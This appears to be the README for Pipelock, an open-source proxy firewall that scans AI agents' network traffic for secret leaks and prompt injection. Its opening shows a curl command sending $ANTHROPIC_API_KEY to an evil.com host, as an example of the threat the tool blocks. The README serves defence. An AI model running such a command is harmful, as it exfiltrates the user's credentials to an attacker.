<p align="center"> <img src="assets/pipelock-logo.svg" alt="Pipelock" width="200"> </p>

Pipelock

Open-source agent firewall for AI agents. Single binary, zero runtime dependencies.

Your agent has $ANTHROPIC_API_KEY in its environment, plus shell access. One request is all it takes:

curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY"   # game over, unless pipelock is watching

Works with: Claude Code · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph · Cursor

Quick Start · Integration Guides · Docs · Blog

Quick Start

# macOS / Linux
brew install luckyPipewrench/tap/pipelock

# Or download a binary (no dependencies)
# See https://github.com/luckyPipewrench/pipelock/releases

# Or with Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest

# Or from source (requires Go 1.25+)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest

Try it in 30 seconds:

# 1. Generate a config
pipelock generate config --preset balanced > pipelock.yaml

# 2. This should be BLOCKED (DLP catches the fake API key)
pipelock check --config pipelock.yaml --url "https://example.com/?key=sk-ant-api03-fake1234567890"

# 3. This should be ALLOWED (clean URL, no secrets)
pipelock check --config pipelock.yaml --url "https://docs.python.org/3/"

<details> <summary>Forward proxy mode (zero code changes, any HTTP client)</summary>

The forward proxy intercepts standard HTTPS_PROXY traffic. Enable it in your config, then point any process at pipelock:

# Edit pipelock.yaml: set forward_proxy.enabled to true
pipelock run --config pipelock.yaml

export HTTPS_PROXY=http://127.0.0.1:8888
export HTTP_PROXY=http://127.0.0.1:8888

# Now every HTTP request flows through pipelock's scanner.
curl "https://example.com/?key=sk-ant-api03-fake1234567890"  # blocked

No SDK, no wrapper, no code changes. If the agent speaks HTTP, pipelock scans it.

</details> <details> <summary>Fetch proxy mode (for agents with a dedicated fetch tool)</summary>

# Start the proxy (agents connect to localhost:8888/fetch?url=...)
pipelock run --config pipelock.yaml

# For full network isolation (agent can ONLY reach pipelock):
pipelock generate docker-compose --agent claude-code -o docker-compose.yaml
docker compose up

</details> <details> <summary>Verify release integrity (SLSA provenance + SBOM)</summary>

Every release includes SLSA build provenance and an SBOM (CycloneDX). Verify with the GitHub CLI:

# Verify a downloaded binary
gh attestation verify pipelock_*_linux_amd64.tar.gz --owner luckyPipewrench

# Verify the container image (substitute the release version)
gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:<version> --owner luckyPipewrench

</details>

Community Rules

Pipelock supports signed rule bundles for distributable detection patterns. Install the official community bundle for additional DLP, injection, and tool-poison patterns beyond the built-in defaults:

pipelock rules install pipelock-community

Rules are loaded at startup and merged with built-in patterns. Bundles are Ed25519-signed and verified against the embedded keyring, which is present in release binaries (Homebrew, GitHub Releases, Docker). Source builds via go install must add the official public key to trusted_keys in their config. See docs/rules.md for details.

How It Works

Pipelock is an agent firewall: like a WAF for web apps, it sits inline between your AI agent and the internet. It uses capability separation: the agent process (which has secrets) is network-restricted, while Pipelock (which holds no agent secrets) inspects all traffic through an 11-layer scanner pipeline. Deployment (Docker network isolation, Kubernetes NetworkPolicy, etc.) enforces the separation boundary.

Three proxy modes, same port:

• Fetch proxy (/fetch?url=...): Pipelock fetches the URL, extracts text, scans the response for prompt injection, and returns clean content. Best for agents that use a dedicated fetch tool.
• Forward proxy (HTTPS_PROXY): Standard HTTP CONNECT tunneling and absolute-URI forwarding. Agents use Pipelock as their system proxy with zero code changes. Hostname scanning catches blocked domains and SSRF before the tunnel opens. Request body and header DLP scanning catches secrets in POST bodies and auth headers. Optional TLS interception decrypts CONNECT tunnels for full body/header DLP and response injection scanning (requires CA setup via pipelock tls init and pipelock tls install-ca).
• WebSocket proxy (/ws?url=ws://...): Bidirectional frame scanning with DLP + injection detection on text frames. Fragment reassembly, message size limits, idle timeout, and connection lifetime controls are all built in.

flowchart LR
    subgraph PRIV["PRIVILEGED ZONE"]
        Agent["AI Agent\nAPI keys + credentials + source code\nNetwork-isolated by deployment"]
    end

    subgraph FW["FIREWALL ZONE"]
        Proxy["Pipelock\n11-layer scanner pipeline\nNo agent secrets"]
    end

    subgraph NET["INTERNET"]
        Web["APIs + MCP Servers + Web"]
    end

    Agent -- "fetch / CONNECT / ws / MCP" --> Proxy
    Proxy -- "scanned request" --> Web
    Web -- "response" --> Proxy
    Proxy -- "scanned content" --> Agent

    style PRIV fill:#2d1117,stroke:#f85149,color:#e6edf3
    style FW fill:#0d2818,stroke:#3fb950,color:#e6edf3
    style NET fill:#0d1b2e,stroke:#58a6ff,color:#e6edf3
    style Agent fill:#1a1a2e,stroke:#f85149,color:#e6edf3
    style Proxy fill:#0d2818,stroke:#3fb950,color:#e6edf3
    style Web fill:#0d1b2e,stroke:#58a6ff,color:#e6edf3

<details> <summary>Text diagram (for terminals / non-mermaid renderers)</summary>

┌──────────────────────┐         ┌───────────────────────┐
│  PRIVILEGED ZONE     │         │  FIREWALL ZONE        │
│                      │         │                       │
│  AI Agent            │  IPC    │  Pipelock             │
│  - Has API keys      │────────>│  - No agent secrets   │
│  - Has credentials   │ fetch / │  - Full internet      │
│  - Restricted network│ CONNECT │  - Returns text       │
│                      │ /ws     │  - WS frame scanning  │
│                      │<────────│  - URL scanning       │
│  Can reach:          │ content │  - Audit logging      │
│  ✓ api.anthropic.com │         │                       │
│  ✓ discord.com       │         │  Can reach:           │
│  ✗ evil.com          │         │  ✓ Any URL            │
│  ✗ pastebin.com      │         │  But has:             │
└──────────────────────┘         │  ✗ No env secrets     │
                                 │  ✗ No credentials     │
                                 └───────────────────────┘

</details>

Why Pipelock?

| | Pipelock | Scanners (agent-scan) | Sandboxes (srt) | Kernel agents (agentsh) | |---|---|---|---|---| | Secret exfiltration prevention | Yes | Partial (proxy mode) | Partial (domain-level) | Yes | | DLP + entropy analysis | Yes | No | No | Partial | | Prompt injection detection | Yes | Yes | No | No | | Workspace integrity monitoring | Yes | No | No | Partial | | MCP scanning (bidirectional + tool poisoning) | Yes | Yes | No | No | | WebSocket proxy (frame scanning + fragment reassembly) | Yes | No | No | No | | MCP HTTP transport (Streamable HTTP + reverse proxy) | Yes | No | No | No | | Emergency kill switch (config + signal + file + API) | Yes | No | No | No | | Event emission (webhook + syslog) | Yes | No | No | No | | Tool call chain detection | Yes | No | No | No | | Single binary, zero deps | Yes | No (Python) | No (npm) | No (kernel-level enforcement) | | Audit logging + Prometheus | Yes | No | No | No |

Full comparison: docs/comparison.md

Security Matrix

Pipelock runs in three modes:

| Mode | Security | Web Browsing | Use Case | |------|----------|--------------|----------| | strict | Allowlist-only | None | Regulated industries, high-security | | balanced | Blocks naive + detects sophisticated | Via fetch or forward proxy | Most developers (default) | | audit | Logging only | Unrestricted | Evaluation before enforcement